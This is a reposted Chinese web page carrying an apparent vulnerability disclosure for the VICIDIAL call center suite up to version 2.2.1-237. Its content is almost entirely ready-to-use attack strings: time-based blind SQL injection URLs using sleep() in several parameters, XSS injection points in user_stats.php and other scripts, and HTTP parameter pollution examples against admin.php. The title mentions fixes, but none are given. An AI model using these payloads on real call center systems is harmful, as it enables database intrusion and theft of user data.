当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

VICIDIAL Call Center Suite =2.2.1-237多个缺陷及修复

时间:2013/4/19 12:09:00 作者:平凡之路 来源:xuhantao.com 浏览:

 ...:::::VICIDIAL call center suite Blind SQL Injection Vulnerability::::.... #          
作者: Sepahan TelCom IT Group (septelcom) 

官网:

下载地址: https://sourceforge.net/project/showfiles.php?group_id=95133&package_id=101320

受影响版本: <=2.2.1-237 
VICIDIAL is a set of programs that are designed to 

interact with the Asterisk Open-Source PBX Phone system 

to act as a complete inbound/outbound call center suite. 

-------------------------------------------------------- 
 
spl:Z.Khodaee 

测试exp
  

?agent=some-agent' and sleep(15)='&calls_summary=1&query_date=2012-09-07 

/AST_timeonVDADall.php?adastats=1&DB=0&groups[]=1345' and sleep(15)='&RR=4 

?user=2000' and sleep(10)=' 


  #################################################################################### 
 
  #     ...:::::VICIDIAL call center suite XSS/HTTP Prameter pollution::::....       #          

影响版本: <=2.2.1-237 

  

spl:Z.Khodaee 

  
测试:
XSS : 

  

?alt_phone_search=&DB=1&first_name=lskkuuaj&last_name=lskkuuaj&lead_id=1&list_id=1&log_lead_id=1&log_phone=555-666-0606&phone=555-666-0606&status=1&submit=SUBMIT&user=[XSS]&vendor_id=1

/user_stats.php?user=[XSS] 

-------------- 

HTTP Prameter plution: 

  

?user=shtuasvb&begin_date=2012-09-07&end_date=2012-09-07{HTPP} 

example : /user_stats.php?user=shtuasvb&begin_date=2012-09-07&end_date=2012-09-07&hadi685=sep148 

  

?ADD=3&user=someuser{HTPP} 

示例: ./admin.php?ADD=3&user=hadi&sep18=tell15 

,www.xuhantao.com,涛涛电脑知识

相关文章
  • 没有相关文章
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1